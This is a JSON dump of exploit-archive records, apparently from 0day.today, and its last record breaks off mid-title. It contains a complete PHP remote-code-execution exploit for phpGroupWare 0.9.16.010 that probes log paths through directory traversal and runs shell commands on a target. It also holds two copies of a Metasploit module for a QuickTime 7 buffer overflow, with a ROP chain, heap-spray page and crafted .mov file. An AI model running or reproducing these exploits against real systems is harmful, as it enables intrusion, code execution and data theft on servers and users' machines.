phpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit

{"type": "zdt", "lastseen": "2016-04-20T02:05:34", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "phpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit", "published": "2006-08-29T00:00:00", "href": "http://0day.today/exploit/description/756", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for unknown platform in category web applications", "hash": "aab40e039063d1b26e98326632fe4994929bb69e9d8ad4a852a5eed23bc02678", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "==================================================================\r\nphpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit\r\n==================================================================\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\n/*\r\nthis works against register_globals=On\r\nand magic quotes = off :) \r\n*/\r\n/*\r\nvulnerable code => calendar/inc/class.holidaycalc.inc.php line 14-33:\r\n....\r\n /* $Id: class.holidaycalc.inc.php,v 1.5 2001/08/26 12:32:28 skeeter Exp $ */\r\n\r\n\tif (empty($GLOBALS['phpgw_info']['user']['preferences']['common']['country']))\r\n\t{\r\n\t\t$rule = 'US';\r\n\t}\r\n\telse\r\n\t{\r\n\t\t$rule = $GLOBALS['phpgw_info']['user']['preferences']['common']['country'];\r\n\t}\r\n\r\n\t$calc_include = PHPGW_INCLUDE_ROOT.'/calendar/inc/class.holidaycalc_'.$rule.'.inc.php';\r\n\tif(@file_exists($calc_include))\r\n\t{\r\n\t\tinclude($calc_include);\r\n\t}\r\n\telse\r\n\t{\r\n\t\tinclude(PHPGW_INCLUDE_ROOT.'/calendar/inc/class.holidaycalc_US.inc.php');\r\n\t}\r\n....\r\n\r\nex: \r\nhttp://www.site.com/[phpGroupWare_path]/calendar/inc/class.holidaycalc.inc.php?GLOBALS[phpgw_info][user][preferences][common][country]=../../../../../../../../../etc/passwd%00\r\n*/\r\n\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\";\r\necho \"+\\r\\n\";\r\necho \"- - - [DEVIL TEAM THE BEST POLISH TEAM] - -\\r\\n\\r\\n\";\r\necho \"+\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\\"\\r\\n\";\r\necho \"+\\r\\n\\r\\n\";\r\necho \"- phpGroupWare <= 0.9.16.010 GLOBALS[] Remote Code Execution Exploit\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"- [Script name: phpGroupWare v. 0.9.16.010\"\\r\\n\";\r\necho \"- [Script site: http://sourceforge.net/projects/phpgroupware/\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"- Find by: Kacper (a.k.a Rahim)\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"- Special Greetz: DragonHeart ;-)\"\\r\\n\";\r\necho \"- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi, nukedclx, mivus ;]\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"!@ Przyjazni nie da sie zamienic na marne korzysci @!\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"- Z Dedykacja dla osoby,\"\\r\\n\";\r\necho \"- bez ktorej nie mogl bym zyc...\"\\r\\n\";\r\necho \"- K.C:* J.M (a.k.a Magaja)\"\\r\\n\";\r\necho \"+\"\\r\\n\";\r\necho \"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\\"\\r\\n\";\r\nif ($argc<4) {\r\necho \"Usage: php \".$argv[0].\" host path cmd options\\r\\n\";\r\necho \"host: target server (ip/hostname)\\r\\n\";\r\necho \"path: path to PHPList\\r\\n\";\r\necho \"cmd: a shell command\\r\\n\";\r\necho \"Options:\\r\\n\";\r\necho \" -p[port]: specify a port other than 80\\r\\n\";\r\necho \" -P[ip:port]: specify a proxy\\r\\n\";\r\necho \"Examples:\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /lists/ cat ./config/config.php\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /lists/ ls -la -p81\\r\\n\";\r\necho \"php \".$argv[0].\" localhost / ls -la -P1.1.1.1:80\\r\\n\";\r\ndie;\r\n}\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\nfunction make_seed()\r\n{\r\n list($usec, $sec) = explode(' ', microtime());\r\n return (float) $sec + ((float) $usec * 100000);\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$cmd=\"\";$port=80;$proxy=\"\";\r\n\r\nfor ($i=3; $i<=$argc-1; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif (($temp<>\"-p\") and ($temp<>\"-P\"))\r\n{$cmd.=\" \".$argv[$i];}\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\n$cmd=urlencode($cmd);\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n$paths=array(\r\n\"../../../../../../../../../../../../var/log/httpd/access_log\",\r\n\"../../../../../../../../../../../../var/log/httpd/error_log\",\r\n\"../../../apache/logs/error.log\",\r\n\"../../../apache/logs/access.log\",\r\n\"../../../../apache/logs/error.log\",\r\n\"../../../../apache/logs/access.log\",\r\n\"../../../../../apache/logs/error.log\",\r\n\"../../../../../apache/logs/access.log\",\r\n\"../../../../../../apache/logs/error.log\",\r\n\"../../../../../../apache/logs/access.log\",\r\n\"../../../../../../../apache/logs/error.log\",\r\n\"../../../../../../../apache/logs/access.log\",\r\n\"../../../../../../../../apache/logs/error.log\",\r\n\"../../../../../../../../apache/logs/access.log\",\r\n\"../../../logs/error.log\",\r\n\"../../../logs/access.log\",\r\n\"../../../../logs/error.log\",\r\n\"../../../../logs/access.log\",\r\n\"../../../../../logs/error.log\",\r\n\"../../../../../logs/access.log\",\r\n\"../../../../../../logs/error.log\",\r\n\"../../../../../../logs/access.log\",\r\n\"../../../../../../../logs/error.log\",\r\n\"../../../../../../../logs/access.log\",\r\n\"../../../../../../../../logs/error.log\",\r\n\"../../../../../../../../logs/access.log\",\r\n\"../../../../../../../../../../../../etc/httpd/logs/acces_log\",\r\n\"../../../../../../../../../../../../etc/httpd/logs/acces.log\",\r\n\"../../../../../../../../../../../../etc/httpd/logs/error_log\",\r\n\"../../../../../../../../../../../../etc/httpd/logs/error.log\",\r\n\"../../../../../../../../../../../../var/www/logs/access_log\",\r\n\"../../../../../../../../../../../../var/www/logs/access.log\",\r\n\"../../../../../../../../../../../../usr/local/apache/logs/access_log\",\r\n\"../../../../../../../../../../../../usr/local/apache/logs/access.log\",\r\n\"../../../../../../../../../../../../var/log/apache/access_log\",\r\n\"../../../../../../../../../../../../var/log/apache/access.log\",\r\n\"../../../../../../../../../../../../var/log/access_log\",\r\n\"../../../../../../../../../../../../var/www/logs/error_log\",\r\n\"../../../../../../../../../../../../var/www/logs/error.log\",\r\n\"../../../../../../../../../../../../usr/local/apache/logs/error_log\",\r\n\"../../../../../../../../../../../../usr/local/apache/logs/error.log\",\r\n\"../../../../../../../../../../../../var/log/apache/error_log\",\r\n\"../../../../../../../../../../../../var/log/apache/error.log\",\r\n\"../../../../../../../../../../../../var/log/access_log\",\r\n\"../../../../../../../../../../../../var/log/error_log\"\r\n);\r\nfor ($i=0; $i<=count($paths)-1; $i++)\r\n{\r\n$a=$i+2;\r\necho \"[\".$a.\"] PATH: \".$paths[$i].\"\\r\\n\";\r\n$packet =\"GET \".$p.\"calendar/inc/class.holidaycalc.inc.php?GLOBALS[phpgw_info][user][preferences][common][country]=\".$paths[$i].\"%00&cmd=\".$cmd.\" HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: Googlebot/2.1\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (strstr($html,\"56789\"))\r\n{\r\n $temp=explode(\"56789\",$html);\r\n echo $temp[1];\r\n echo \"\\r\\nExploit succeeded...\\r\\n\";\r\n die;\r\n}\r\n}\r\n?>\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-756", "sourceHref": "http://0day.today/exploit/756", "modified": "2006-08-29T00:00:00", "reporter": "Kacper", "enchantments": {"vulnersScore": 4.1}}

{"result": {"zdt": [{"lastseen": "2016-04-19T01:01:59", "references": [], "description": "Exploit for windows platform in category remote exploits", "edition": 1, "reporter": "metasploit", "published": "2013-07-22T00:00:00", "type": "zdt", "title": "Apple Quicktime 7 Invalid Atom Length Buffer Overflow", "bulletinFamily": "exploit", "cvelist": [], "modified": "2013-07-22T00:00:00", "href": "http://0day.today/exploit/description/21017", "id": "1337DAY-ID-21017", "sourceData": "require 'msf/core'\r\n \r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Apple Quicktime 7 Invalid Atom Length Buffer Overflow\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Apple Quicktime. The flaw is\r\n triggered when Quicktime fails to properly handle the data length for certain\r\n atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer\r\n overflow by loading a specially crafted .mov file, and allows arbitrary\r\n code execution under the context of the user.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor\r\n 'Tom Gallagher', # Original Discovery (overlapped)\r\n 'Paul Bates', # Original Discovery (overlapped)\r\n 'sinn3r' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1017' ],\r\n [ 'BID', '60097' ],\r\n [ 'URL', 'http://support.apple.com/kb/HT5770' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n # All of the following addresses are from Quicktime.qts\r\n # RET = ADD ESP,280; RET, Nop = RET, Pop = POP ESP; RET\r\n [ 'Quicktime 7.7.3 with IE 8 on Windows XP SP3', {'Ret' => 0x66923467, 'Nop' => 0x6692346d, 'Pop' => 0x66849239} ],\r\n [ 'Quicktime 7.7.2 with IE 8 on Windows XP SP3', {'Ret' => 0x669211C7, 'Nop' => 0x669211CD, 'Pop' => 0x668C5B55} ],\r\n [ 'Quicktime 7.7.1 with IE 8 on Windows XP SP3', {'Ret' => 0x66920D67, 'Nop' => 0x66920D6D, 'Pop' => 0x66849259} ],\r\n [ 'Quicktime 7.7.0 with IE 8 on Windows XP SP3', {'Ret' => 0x66920BD7, 'Nop' => 0x66920BDD, 'Pop' => 0x668E963A} ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\" # js_property_spray no like nilz\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"May 22 2013\"\r\n ))\r\n end\r\n \r\n def get_payload(t)\r\n p = ''\r\n \r\n rop =\r\n [\r\n 0x77c1e844, # POP EBP # RETN [msvcrt.dll]\r\n 0x77c1e844, # skip 4 bytes [msvcrt.dll]\r\n 0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]\r\n 0xffffffff,\r\n 0x77c127e5, # INC EBX # RETN [msvcrt.dll]\r\n 0x77c127e5, # INC EBX # RETN [msvcrt.dll]\r\n 0x77c4e0da, # POP EAX # RETN [msvcrt.dll]\r\n 0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)\r\n 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]\r\n 0x77c34fcd, # POP EAX # RETN [msvcrt.dll]\r\n 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)\r\n 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n 0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]\r\n 0x77c3048a, # POP EDI # RETN [msvcrt.dll]\r\n 0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]\r\n 0x77c46efb, # POP ESI # RETN [msvcrt.dll]\r\n 0x77c2aacc, # JMP [EAX] [msvcrt.dll]\r\n 0x77c3b860, # POP EAX # RETN [msvcrt.dll]\r\n 0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]\r\n 0x77c12df9, # PUSHAD # RETN [msvcrt.dll]\r\n 0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]\r\n ].pack(\"V*\")\r\n \r\n p << rop\r\n p << \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n p << payload.encoded\r\n \r\n p\r\n end\r\n \r\n \r\n def targetable?(agent)\r\n if agent =~ /MSIE 8\\.0/ and agent =~ /Windows NT 5\\.1/\r\n return true\r\n elsif agent =~ /contype/\r\n # contype: a mov file request from Apple Quicktime\r\n return true\r\n end\r\n \r\n false\r\n end\r\n \r\n \r\n def get_html(t)\r\n js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))\r\n fake_mov_name = rand_text_alpha(4) + \".mov\"\r\n html = %Q|\r\n <html>\r\n <head>\r\n <script>\r\n #{js_property_spray}\r\n \r\n var s = unescape(\"#{js_p}\");\r\n sprayHeap({shellcode:s});\r\n </script>\r\n </head>\r\n <body>\r\n <embed src=\"#{get_resource}/#{fake_mov_name}\" width=\"0\" height=\"0\"></embed>\r\n </body>\r\n </html>\r\n |\r\n \r\n html.gsub(/^\\t\\t/, '')\r\n end\r\n \r\n \r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n print_status(\"Requesting: #{request.uri}\")\r\n \r\n unless targetable?(agent)\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n \r\n print_status(\"Target selected as: #{target.name}\") if target\r\n \r\n if request.uri =~ /\\.mov$/\r\n print_status(\"Sending specially crafted .mov file\")\r\n send_response(cli, @exploit, { 'Content-Type' => 'application/octet-stream' })\r\n else\r\n html = get_html(target)\r\n send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })\r\n end\r\n end\r\n \r\n def sort_bytes(data)\r\n data.map { |e| [e].pack('N').scan(/../).reverse.join }.join\r\n end\r\n \r\n def rop_nop(t)\r\n [t['Nop']].pack('V*') # Ret (QuickTime.qts)\r\n end\r\n \r\n def exploit\r\n buf = ''\r\n buf << rand_text_alpha(467) # 467 to align the pivot\r\n 10.times {\r\n buf << rop_nop(target)\r\n }\r\n buf << [\r\n target['Pop'], # POP ESP; RET (QuickTime.qts)\r\n 0x20302020 # Target value for ESP (our ROP payload)\r\n ].pack('V*')\r\n buf << rand_text_alpha(611 - buf.length) # Offset 611 to hit SE Handler\r\n buf << sort_bytes([target.ret]) # ADD ESP,280; RET (QuickTime.qts) - pivot\r\n buf << rand_text_alpha(658 - buf.length) # 658 bytes to pad up the mov file size\r\n \r\n # Quicktime File Format Specifications:\r\n # https://developer.apple.com/standards/qtff-2001.pdf\r\n mov = \"\\x00\\x00\\x06\\xDF\" # File size\r\n mov << \"moov\" # Movie atom\r\n mov << \"\\x00\\x00\\x06\\xD7\" # size (1751d)\r\n mov << \"rmra\" # Reference Movie atom\r\n mov << \"\\x00\\x00\\x06\\xCF\" # size (1743d)\r\n mov << \"rmda\" # rmda atom\r\n mov << \"\\x00\\x00\\x06\\xBF\" # size (1727d)\r\n mov << \"rdrf\" # Data reference atom\r\n mov << \"\\x00\\x00\\x00\\x00\" # size set to 0\r\n mov << \"alis\" # Data reference type: FS alias record\r\n mov << \"\\x00\\x00\\x06\\xAA\" # Size (1706d)\r\n mov << rand_text_alpha(8)\r\n mov << \"\\x00\\x00\\x06\\x61\" # Size (1633d)\r\n mov << rand_text_alpha(38)\r\n mov << \"\\x12\"\r\n mov << rand_text_alpha(81)\r\n mov << \"\\xFF\\xFF\"\r\n mov << rand_text_alpha(18)\r\n mov << \"\\x00\\x08\" # Size (8d)\r\n mov << rand_text_alpha(8)\r\n mov << \"\\x00\\x00\"\r\n mov << \"\\x00\\x08\" # Size (8d)\r\n mov << rand_text_alpha(8)\r\n mov << \"\\x00\\x00\"\r\n mov << \"\\x00\\x26\" # Size (38d)\r\n mov << rand_text_alpha(38)\r\n mov << \"\\x00\\x0F\\x00\\x0E\"\r\n mov << \"AA\" # Size (must be invalid)\r\n mov << rand_text_alpha(12)\r\n mov << \"\\x00\\x12\\x00\\x21\"\r\n mov << rand_text_alpha(36)\r\n mov << \"\\x00\"\r\n mov << \"\\x0F\\x33\"\r\n mov << rand_text_alpha(17)\r\n mov << \"\\x02\\xF4\" # Size (756h)\r\n mov << rand_text_alpha(756)\r\n mov << \"\\xFF\\xFF\\x00\\x00\\x00\"\r\n mov << buf\r\n \r\n @exploit = mov\r\n super\r\n end\r\nend\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/21017"}, {"lastseen": "2016-04-19T04:14:53", "references": [], "description": "This Metasploit module exploits a vulnerability found in Apple Quicktime. The flaw is triggered when Quicktime fails to properly handle the data length for certain atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer overflow by loading a specially crafted .mov file, and allows arbitrary code execution under the context of the user.", "edition": 1, "reporter": "metasploit", "published": "2013-07-19T00:00:00", "type": "zdt", "title": "Apple Quicktime 7 Invalid Atom Length Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1017"], "modified": "2013-07-19T00:00:00", "href": "http://0day.today/exploit/description/21009", "id": "1337DAY-ID-21009", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Apple Quicktime 7 Invalid Atom Length Buffer Overflow\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Apple Quicktime. The flaw is\r\n triggered when Quicktime fails to properly handle the data length for certain\r\n atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer\r\n overflow by loading a specially crafted .mov file, and allows arbitrary\r\n code execution under the context of the user.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor\r\n 'Tom Gallagher', # Original Discovery (overlapped)\r\n 'Paul Bates', # Original Discovery (overlapped)\r\n 'sinn3r' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1017' ],\r\n [ 'BID', '60097' ],\r\n [ 'URL', 'http://support.apple.com/kb/HT5770' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n # All of the following addresses are from Quicktime.qts\r\n # RET = ADD ESP,280; RET, Nop = RET, Pop = POP ESP; RET\r\n [ 'Quicktime 7.7.3 with IE 8 on Windows XP SP3', {'Ret' => 0x66923467, 'Nop' => 0x6692346d, 'Pop' => 0x66849239} ],\r\n [ 'Quicktime 7.7.2 with IE 8 on Windows XP SP3', {'Ret' => 0x669211C7, 'Nop' => 0x669211CD, 'Pop' => 0x668C5B55} ],\r\n [ 'Quicktime 7.7.1 with IE 8 on Windows XP SP3', {'Ret' => 0x66920D67, 'Nop' => 0x66920D6D, 'Pop' => 0x66849259} ],\r\n [ 'Quicktime 7.7.0 with IE 8 on Windows XP SP3', {'Ret' => 0x66920BD7, 'Nop' => 0x66920BDD, 'Pop' => 0x668E963A} ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\" # js_property_spray no like nilz\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"May 22 2013\"\r\n ))\r\n end\r\n\r\n def get_payload(t)\r\n p = ''\r\n\r\n rop =\r\n [\r\n 0x77c1e844, # POP EBP # RETN [msvcrt.dll]\r\n 0x77c1e844, # skip 4 bytes [msvcrt.dll]\r\n 0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]\r\n 0xffffffff,\r\n 0x77c127e5, # INC EBX # RETN [msvcrt.dll]\r\n 0x77c127e5, # INC EBX # RETN [msvcrt.dll]\r\n 0x77c4e0da, # POP EAX # RETN [msvcrt.dll]\r\n 0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)\r\n 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]\r\n 0x77c34fcd, # POP EAX # RETN [msvcrt.dll]\r\n 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)\r\n 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n 0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]\r\n 0x77c3048a, # POP EDI # RETN [msvcrt.dll]\r\n 0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]\r\n 0x77c46efb, # POP ESI # RETN [msvcrt.dll]\r\n 0x77c2aacc, # JMP [EAX] [msvcrt.dll]\r\n 0x77c3b860, # POP EAX # RETN [msvcrt.dll]\r\n 0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]\r\n 0x77c12df9, # PUSHAD # RETN [msvcrt.dll]\r\n 0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]\r\n ].pack(\"V*\")\r\n\r\n p << rop\r\n p << \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n p << payload.encoded\r\n\r\n p\r\n end\r\n\r\n\r\n def targetable?(agent)\r\n if agent =~ /MSIE 8\\.0/ and agent =~ /Windows NT 5\\.1/\r\n return true\r\n elsif agent =~ /contype/\r\n # contype: a mov file request from Apple Quicktime\r\n return true\r\n end\r\n\r\n false\r\n end\r\n\r\n\r\n def get_html(t)\r\n js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))\r\n fake_mov_name = rand_text_alpha(4) + \".mov\"\r\n html = %Q|\r\n <html>\r\n <head>\r\n <script>\r\n #{js_property_spray}\r\n\r\n var s = unescape(\"#{js_p}\");\r\n sprayHeap({shellcode:s});\r\n </script>\r\n </head>\r\n <body>\r\n <embed src=\"#{get_resource}/#{fake_mov_name}\" width=\"0\" height=\"0\"></embed>\r\n </body>\r\n </html>\r\n |\r\n\r\n html.gsub(/^\\t\\t/, '')\r\n end\r\n\r\n\r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n print_status(\"Requesting: #{request.uri}\")\r\n\r\n unless targetable?(agent)\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n print_status(\"Target selected as: #{target.name}\") if target\r\n\r\n if request.uri =~ /\\.mov$/\r\n print_status(\"Sending specially crafted .mov file\")\r\n send_response(cli, @exploit, { 'Content-Type' => 'application/octet-stream' })\r\n else\r\n html = get_html(target)\r\n send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })\r\n end\r\n end\r\n\r\n def sort_bytes(data)\r\n data.map { |e| [e].pack('N').scan(/../).reverse.join }.join\r\n end\r\n\r\n def rop_nop(t)\r\n [t['Nop']].pack('V*') # Ret (QuickTime.qts)\r\n end\r\n\r\n def exploit\r\n buf = ''\r\n buf << rand_text_alpha(467) # 467 to align the pivot\r\n 10.times {\r\n buf << rop_nop(target)\r\n }\r\n buf << [\r\n target['Pop'], # POP ESP; RET (QuickTime.qts)\r\n 0x20302020 # Target value for ESP (our ROP payload)\r\n ].pack('V*')\r\n buf << rand_text_alpha(611 - buf.length) # Offset 611 to hit SE Handler\r\n buf << sort_bytes([target.ret]) # ADD ESP,280; RET (QuickTime.qts) - pivot\r\n buf << rand_text_alpha(658 - buf.length) # 658 bytes to pad up the mov file size\r\n\r\n # Quicktime File Format Specifications:\r\n # https://developer.apple.com/standards/qtff-2001.pdf\r\n mov = \"\\x00\\x00\\x06\\xDF\" # File size\r\n mov << \"moov\" # Movie atom\r\n mov << \"\\x00\\x00\\x06\\xD7\" # size (1751d)\r\n mov << \"rmra\" # Reference Movie atom\r\n mov << \"\\x00\\x00\\x06\\xCF\" # size (1743d)\r\n mov << \"rmda\" # rmda atom\r\n mov << \"\\x00\\x00\\x06\\xBF\" # size (1727d)\r\n mov << \"rdrf\" # Data reference atom\r\n mov << \"\\x00\\x00\\x00\\x00\" # size set to 0\r\n mov << \"alis\" # Data reference type: FS alias record\r\n mov << \"\\x00\\x00\\x06\\xAA\" # Size (1706d)\r\n mov << rand_text_alpha(8)\r\n mov << \"\\x00\\x00\\x06\\x61\" # Size (1633d)\r\n mov << rand_text_alpha(38)\r\n mov << \"\\x12\"\r\n mov << rand_text_alpha(81)\r\n mov << \"\\xFF\\xFF\"\r\n mov << rand_text_alpha(18)\r\n mov << \"\\x00\\x08\" # Size (8d)\r\n mov << rand_text_alpha(8)\r\n mov << \"\\x00\\x00\"\r\n mov << \"\\x00\\x08\" # Size (8d)\r\n mov << rand_text_alpha(8)\r\n mov << \"\\x00\\x00\"\r\n mov << \"\\x00\\x26\" # Size (38d)\r\n mov << rand_text_alpha(38)\r\n mov << \"\\x00\\x0F\\x00\\x0E\"\r\n mov << \"AA\" # Size (must be invalid)\r\n mov << rand_text_alpha(12)\r\n mov << \"\\x00\\x12\\x00\\x21\"\r\n mov << rand_text_alpha(36)\r\n mov << \"\\x00\"\r\n mov << \"\\x0F\\x33\"\r\n mov << rand_text_alpha(17)\r\n mov << \"\\x02\\xF4\" # Size (756h)\r\n mov << rand_text_alpha(756)\r\n mov << \"\\xFF\\xFF\\x00\\x00\\x00\"\r\n mov << buf\r\n\r\n @exploit = mov\r\n super\r\n end\r\nend\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "http://0day.today/exploit/21009"}, {"lastseen": "2016-04-20T00:31:08", "references": [], "description": "Exploit for linux platform in category dos / poc", "edition": 1, "reporter": "Maksymilian", "published": "2011-01-08T00:00:00", "type": "zdt", "title": "GNU 